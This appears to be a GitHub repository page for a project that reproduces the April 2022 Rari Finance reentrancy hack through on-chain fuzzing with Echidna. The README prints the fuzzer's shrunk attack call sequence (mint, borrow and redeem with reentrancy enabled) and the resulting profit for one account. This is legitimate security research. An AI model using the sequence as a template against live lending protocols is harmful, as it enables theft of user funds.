Skip to content

Reproduction of the $80M Rari Finance Hack on April 30 2022 using on-chain fuzzing with Echidna

Notifications You must be signed in to change notification settings

rappie/echidna-rari-hack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Reproduction of Rari Finance hack

Description

This is a reproduction of the $80M Rari Finance hack on April 30 2022, using on-chain fuzzing with Echidna.

We're using a single invariant which checks if an actor is able to increase their balance by an unreasonably large amount. We have a basic set of functions such as mint, borrow and exitMarket, etc. Since the hack involves reentrancy, we've implemented rudementary reentrancy support in EchidnaReentrancy.

After running for approximately 30 minutes (1 worker), we can detect a significant increase in funds for the attacking actor. The shrunk sequence can be seen below.

testProfit(): failed!💥
  Call sequence:
    setReentrancyEnabled(true)
    mint(5,10089325332519370949262917519849428342404732088146691233195543578618300570336)
    setReentrancyCallback(4)
    borrow(2,1164710473815707741)
    redeem(2,995200615491)
    testProfit()

Event sequence:
    Panic(1): Using assert
    Debug(«account0Profit», 0) from: 0xa329c0648769a73afac7f9381e08fb43dbea72
    Debug(«account1Profit», 1002263350696681541) from: 0xa329c0648769a73afac7f9381e08fb43dbea72
    Debug(«account2Profit», 0) from: 0xa329c0648769a73afac7f9381e08fb43dbea72

Links

About

Reproduction of the $80M Rari Finance Hack on April 30 2022 using on-chain fuzzing with Echidna

Topics

Resources

Stars

Watchers

Forks